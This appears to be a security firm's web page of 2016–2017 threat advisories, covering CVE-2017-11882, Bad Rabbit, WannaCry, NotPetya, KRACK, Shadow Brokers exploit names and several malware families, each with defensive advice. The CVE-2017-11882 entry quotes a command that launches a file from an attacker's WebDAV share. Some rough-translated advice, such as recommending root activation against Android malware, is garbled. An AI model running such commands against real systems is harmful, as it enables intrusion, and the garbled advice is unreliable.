Security Alerts

  • MailSploit and the vulnerabilities of e-mail applications
    10 Dec 2017
    Security researcher Sabri Haddouche discovered MailSploit, a set of vulnerabilities affecting Apple Mail (macOS, iOS and watchOS) - Mozilla Thunderbird - several Microsoft email clients - Yahoo Mail - ProtonMail and others.

    Although most of these affected email client applications have implemented anti-spoofing mechanisms (such as DKIM and DMARC), MailSploit takes advantage of the way email clients and web interfaces parse "From" header.

    Email spoofing is an old-school technique, allowing someone to modify email headers and send an email with the forged sender address to trick recipients. Haddouche explained how the lack of knowledge of vulnerable email clients could lead to an online attack without actually exploiting any flaw in DMARC. To demonstrate this attack the researcher created a payload by encoding non-ASCII characters inside the e-mail headers, successfully sending a spoofed e-mail from an official address belonging to President of the United States. 
    Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it. However, Mozilla and Opera consider this error to be a server-side issue .

    Correction:
    • Inform ASAP your users not to open emails from unknown recipients
    • Quickly update your malware detection software

    Our analysts are already on hand and watch any suspicious activity
  • 17 years vulnerability in Microsoft Office
    30 Nov 2017
    The researchers revealed a serious vulnerability in Microsoft Office that could allow attackers to remotely deploy malicious software on targeted computers. The issue exists in all versions of Microsoft Office that have been released in recent years, including Microsoft Office 365, and works on all versions of the Windows operating system.
     
    This vulnerability was created due to memory-corruption, identified as CVE-2017-11882 , and is located in EQNEDT32.EXE, an MS Office component responsible for introducing and editing document developments. However, due to inappropriate memory functions, the item fails to handle objects properly in the memory, destroying it in such a way that the attacker can execute malicious code within the connected user.
     
    This vulnerability enables full control of a system when combined with the exploitation of Windows Kernel privileges (such as CVE-2017-11847). With the release of this patch this month, Microsoft has addressed this vulnerability, by changing the way the affected software handles objects in memory.
     
    Possible scenarios:
    • You can run an arbitrary sequence of commands (for example, to download an arbitrary file from the Internet and run it).
    • Launch an executable file from the hacker-controlled WebDAV server.
    • Ability to run the command " cmd.exe / c start \\ attacker_ip \ ff & nbsp; {C}{C}{C}{C}" that triggers the WebClient boot.
     
    Ways of protection:
    • It is recommended that users apply the November security updates.
    • Users can execute the command at the command line to disable the entry of the item in the Windows registry.
    • Users must also enable the Microsoft Office sandbox to prevent active content from being run (OLE / ActiveX / Macro).
    • Update Antivirus.
    • Activate Sandbox in Firewall and / or endpoints.
  • Bad Rabbit: a new long-range attack
    25 Oct 2017
    Over 200 large organizations in Russia, Ukraine, Turkey, and Germany were infected by a new malware Bad Rabbit. The new attack reminds a lot of the attack that thousands of computers had received from Petya malware targeting corporate networks. System files affected by Bad Rappid are encrypted and hackers are requesting an ransom in bitcoin from their victims to unlock them.

    Spread is done either by falsifying Adobe Flash or by scanning the network to locate the SMB service and then executing the post-exploitation open source tool Mimikatz.
     
    • Inform your users ASAP:
    -  not open emails from unknown recipients
    -  delete the emails about installing / upgrading Adobe Flash Player
    -  not download programs from the web
     
    • Update malware detection software immediately

    Our analysts are already on hand and monitor any suspicious activity.
  • 0-Day Exploit for Adobe flash
    24 Oct 2017
    The well-known Black Oasis team is responsible for identifying and exploiting of a new zero-day vulnerability (CVE-2017-11292) for Adobe Flash Player 21.0.0.226 software. Successful exploitation of this vulnerability allows the execution of malicious code through which FinSpy software is installed.

    The code for exploiting the vulnerability is delivered through a Microsoft Office file. This file contains an ActiveX object including the Flash vulnerability code. The hacker attaches the malicious file to an e-mail message and sends it to the unsuspecting user. When the user opens this file, the malicious code is executed and the FinSpy malware is installed on its computer.

    FinSpy, also known as FinFisher, provides the attacker with extensive spy capabilities on an infected system, including hidden surveillance by camera and microphone activation, Skype calls, etc.

    Adobe will soon release a security update for Flash Player used by its products.

    Our analysts are already on hand and monitor any suspicious activity.
  • WPA2 Hacked
    19 Oct 2017
    Hackers can now attack WPA2 WiFi networks through Key Reinstallation and Krack attacks.

    The attack method works against the 4-way WPA2 handshake that runs when devices try to connect to the wireless network. It aims to negotiate and tamper with the encrypted key as long as the device is connected to the network. As a result, the client is tricked and once the key is installed, encryption of normal data frames will begin when the third handshake is transmitted.

    These messages may be lost or removed and Access Point will be forced to reissue it. So the client will receive the same message many times and will be forced to reinstall it.

    Our analysts are already on hand and monitor any suspicious activity.
  • Trojan: CCleaner
    16 Oct 2017
    About 2.27 million users downloaded and installed the well-known CCleaner software on their computers and mobile devices.
    Cisco's Talos Research research team discovered the violation, which informed Piriform on September 13th and confirmed that the v5.33.6162 program was infringed by cybercriminals between August 15th and September 12th.
    The result of this violation was the addition of a Trojan Horse to the software, which allowed information to be leaked unknowingly to the user. Through this, cybercriminals gathered information such as: computer name, IP addresses, list of installed programs, list of active programs, etc.

    Correction:
    1) Reset user system to date earlier than August 15th.
    2) Scan and clean the machine.
    3) Remove malicious add-on extensions.
    4) Reset to the default program settings.

    Our analysts are already on hand and monitor any suspicious activity.
  • Greek-Turkish cyberwarfare!
    06 Jul 2017
    The now-known hacking team Turk Hack Team has carried out many security attacks on Turkish cyberspace. Now they are also banning the Greek!!!
    Already the first web defacement attacks have taken place on Greek sites, resulting in the loss of confidential information (name, e-mails, phone, occupational status of employees, etc.) of educational institutions and government organizations.
    The result of the above is the Greek response from hackers who attacked Turkish sites and the leak of confidential information.
    Typically, the Greeks Anonymous are asking Turkish hackers to stop the attacks by indicating that they have government databases in their hands. As they say, they have also gained access to Turkish cameras, having already released a demo video as proof of their actions.

    We inform you that our company, through WAF as a Service and Real Threat Management 24x7 service, provides the necessary site protection mechanisms.

    For more information, please call at +30 210 9203300 or email at n.kladakis@netbull.gr
  • New large-scale cyber attack
    27 Jun 2017
    A large-scale cyber attack with ransomware is currently taking place in Europe, having hit hundreds of businesses and other organizations, including banks, construction and other industries, such as Boryspil Airport in Kiev. In Ukraine, have been recorded several pollution incidents, a "hit" also took place against the country's electricity provider, Ukrenego - which left 230,000 people in the country without electricity for about six hours!
    Incidents are also reported in the Netherlands, and Maersk shipping company having confirmed that several of their online infrastructures have been shut down. Similar announcements were made by Rosnoft, an oil company in Russia.
    According to a Kaspersky Lab researcher, the attack is based on the Petwrap malicious software, a variant of the Petya ransomware, which was discovered last March. What makes the situation extremely worrying is that so far it is not clear how exactly the infection is transmitted. It is, however, not possible to rely on the known exploit, like WannaCry, which exploits vulnerability of the SMB protocol that has not been patched.
    The creators of ransomware have not been identified, but their goal is to collect ransom to "free" infected systems. They require from each victim, the amount of $ 300.

    The following actions are proposed:
     
    • User aware not to open attachments from unknown senders
    • Update the antivirus
    • Update the Intrusion Prevention System
    Our analysts are already alert and monitor any suspicious activity.
  • Subtitles: The new backdoor
    12 Jun 2017
    New way of invading computers!
    Hackers can now attack a computer using malicious software that integrate into movie subtitles that users download unsuspecting. Attack is based on the subtitle processing of movie players software and the large number of subtitle formats (> 20). Each format has unique features and capabilities that can be exploited by a hacker.
    Playback programs, such as Kodi.tv, VLC, etc. used by hackers as an entry door. The attack takes place when the user downloads and activates the infected subtitle file, allowing the hacker to access a computer or any IoT device.
     
    To counter the attack, we suggest:
     
    • Upgrading the Player Software to the latest version.
    • The renewal of the IPS subsystem, to prevent this attack.
    • Monitoring and security incidents management through Netbull Managed Threat Defense Services.
  • New Wave of Attacks?
    02 Jun 2017
    After "WannaCry", comes "EsteemAudit" that exploits a vulnerability of Remote Desktop (port: 3389) protocol of the Windows XP and Windows Server 2003, that are not supported by Microsoft.
    The famous ShadowBrokers group says that "EsteemAudit", as well as "EnglishmanDentist" and "ExplodingCan" is a significant risk to these systems, because the appropriate patches have not been created yet, to makes them safe.

    To counter the attack, we suggest:
     
    • Update the IPS service (Checkpoint Reference: CPAI-2017-0424, Date Published: 18 May 2017) to the latest version, in prevent mode.
    • Disable the RDP service, if possible.
    • Real-time 24x7 monitoring for Remote Desktop attacks through inter-chunk heap overflow vulnerability.
    Our company in the frame of customer protection, has already upgraded their IPS systems and has created the appropriate signature on the security incident management platform, to immediately detect the trace of the attack.
  • Alert for new attacks ?
    26 May 2017
    On the occasion of the first Worldwide Cyber Attack that has hit more than 150 countries, which has also hit our country, affecting the Aristotle University, we inform you that the now-known team “Shadow Brokers” has announced that it will publish a series of exploits, that it would better to know.
     
    The exploits that have been announced are as follows:
     
    • EARLYSHOVEL RedHat 7.0 - 7.1 Sendmail 8.11.x exploit.
    • EBBISLAND (EBBSHAVE) root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86.  
    • ECHOWRECKER remote Samba 3.0.x Linux exploit.  
    • EASYBEE appears to be an MDaemon email server vulnerability.  
    • EASYFUN EasyFun 2.2.0 Exploit for WDaemon / IIS MDaemon/WorldClient pre 9.5.6.  
    • EASYPIX is an IBM Lotus Notes exploit that gets detected as Stuxnet.  
    • EWOKFRENZY is an exploit for IBM Lotus Domino 6.5.4 & 7.0.2.  
    • EXPLODINGCAN is an IIS 6.0 exploit that creates a remote backdoor.  
    • ETERNALROMANCE is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010).  
    • EDUCATEDSCHOLAR is a SMB exploit (MS09-050).  
    • EMERALDTHREAD is a SMB exploit for Windows XP and Server 2003 (MS10-061).  
    • EMPHASISMINE is a remote IMAP exploit for IBM Lotus Domino 6.6.4 to 8.5.2.  
    • ENGLISHMANSDENTIST sets Outlook Exchange WebAccess rules to trigger executable code on the client's side to send an email to other users.  
    • EPICHERO 0-day exploit (RCE) for Avaya Call Server.  
    • ERRATICGOPHER is a SMBv1 exploit targeting Windows XP and Server 2003.  
    • ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010).  
    • ETERNALCHAMPION is a SMBv1 exploit.  
    • ESKIMOROLL is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers.  
    • ECLIPSEDWING is an RCE exploit for the Server service in Windows Server 2008 and later (MS08-067).  
    • ETCETERABLUE is an exploit for IMail 7.04 to 8.05  
    • EXPIREDPAYCHECK IIS6 exploit  
    • EAGERLEVER NBT/SMB exploit for Windows NT4.0, 2000, XP SP1 & SP2, 2003 SP1 & Base Release  
    • EASYFUN WordClient / IIS6.0 exploit  
    • ESSAYKEYNOTE
    More information you can find in Exploit DataBase. 
  • First Worldwide Cyber attack!
    12 May 2017
    More than 40,000 are now the attacks that have been recorded in 74 countries during the first cyberwar which hackers have launched. The attack began in Great Britain, where the National Health System was hit and "locked" computers forcing hospitals to send patients elsewhere. But quickly, the attack spread to many countries. The attack was implemented using a new version of WanaCry malware.
    WanaCry or WanaCrypt0r2.0 is software that exploits a Windows vulnerability, seeking the infection of each workstation. Its purpose is to encrypt important files to receive money as ransom to deliver the decryption key. Computer infection can come from a document of Word, PDF, and generally from emailed or infected computer files. It initially infects a computer and tries to spread across the internal network.

    To face the attack, we suggest:
     
    • Updating the Windows operating system with the latest security hotfixes
    • The installation of zero-time malware protection software
    • User awareness
     
    If the machine is infected with WanaCrypt0r ransomware then you should:
     
    • Disconnect the machine from the Internet, and do not send any file to another machine to prevent it from spreading.
    • Clean up the machine, check the network, and restore the files from the backup, if any.
    • Update the Windows operating system with the latest security hotfixes.
    • Install zero-time malware protection software.
  • Cybercriminals steal information from the accounts of Yahoo's users.
    29 Sep 2016
    Yahoo reveals breach about 500 million accounts for which they feel responsible cybercriminals who are supported by the government of a country. In late 2014, cybercriminals penetrated the internal network of the company and received information on unlisted accounts of users. On specific information included names, email addresses, phone numbers, birth dates, hashed passwords, and sometimes encrypted or non security questions and answers.
    Yahoo claims that the attackers had access to sensitive information such as unprotected codes, details of bank accounts and credit or debit card as it was stored in a third system in which the attackers were unable to gain access. The company wanted to reassure users pointed out that there is no indication that the intruders still have access to their system nevertheless advised to change their passwords if they had not been attempted since 2014 and to avoid visiting links or download attached files of suspicious messages.
     
    To protect against similar types of attacks are suggested:
     
    • Installation of an endpoint protection software (antivirus, firewall, IPS, Application Control).
    • Frequent change of passwords.
    • Avoiding the use of the same or similar password on the Internet and to corporate systems.
    • Use strong passwords.
    • The user awareness with the attack techniques used by hackers.
  • Redirector.Paco
    08 Sep 2016
    The Redirector.Paco is a malicious HTTPS type software hijacking click-fraud. Its purpose is to redirect Internet traffic to malicious websites when an unsuspecting user uses a search engine such as Google, Yahoo or Bing.
    For the redirection of traffic, the malware modifies registry of workstations, changing the parameters «AutoConfigURL" and "AutoConfigProxy" so that for every web application that makes a user to connect to a web proxy controlled by the hackers and fed with the results they want.
    The malware is distributed via installers pirated versions of popular software such as WinRAR, YouTube Downloader, etc.

    To protect against this malicious software are proposed:
     
    • Regularly backup
    • Installation of endpoint protection software (antivirus, firewall, IPS, Application Control
    • Installation of malicious zero-code scanning software (zero day protection malware)
  • HummingBad
    03 Aug 2016
    The HummingBad is a new type of Android malicious software affecting millions of smartphones and tablets around the world during the last few days. The creators of this malicious software working for an advertising agency called "Yingmob", which operates outside China. Previously rumored that the company had to purchase a malicious iOS software named "YiSpecter". The HummingBad is a malware which installs a permanent rootkit software on Android devices, it creates false advertising revenues and installs malicious applications. The way that HummingBad works, makes it very difficult to detect it, since the malicious code of this software is encrypted. Furthermore, the malware starts a silent vector type attack, and if failed to launch a second attack on which would have the same opportunity as the first. Finally, each phase of the attack consists of several stages, including decryption and decompression of malicious code. Usually detected as «Android.Trojan.Iop.Y" or "Android.Trojan.Agent.A"

    To protect against this malicious software are proposed:

    • The root account activation to prevent your Android device
    • Do not allow installation of applications from "anonymous sources"
    • The upgrade of the mobile to the operating system's latest version
    • Installation of malicious zero-code scanning software (zero day protection malware)
  • Satana Ransomware
    26 Jul 2016
    Satana Ransomware is a combination of a classic type of malicious ransomware software and Petya. Hackers have developed a new type of malicious ransomware software which destroys the master boot record (MRB), just like Petya. The Satana is designed to penetrate silently in computers and encrypt files. During the encryption in the front of the file name is inserted the email address of the attacker. Then the malware encrypts the MRB and replaces it with a new one. Once the user restarts his computer, the new code is loaded in the MRB and a message will appear requiring ransom to restore the file.

    To protect against this malicious software are proposed:
     
    • Regularly backup
    • Installation of endpoint protection software (antivirus, firewall, IPS, Application Control
    • Installation of malicious zero-code scanning software (zero day protection malware)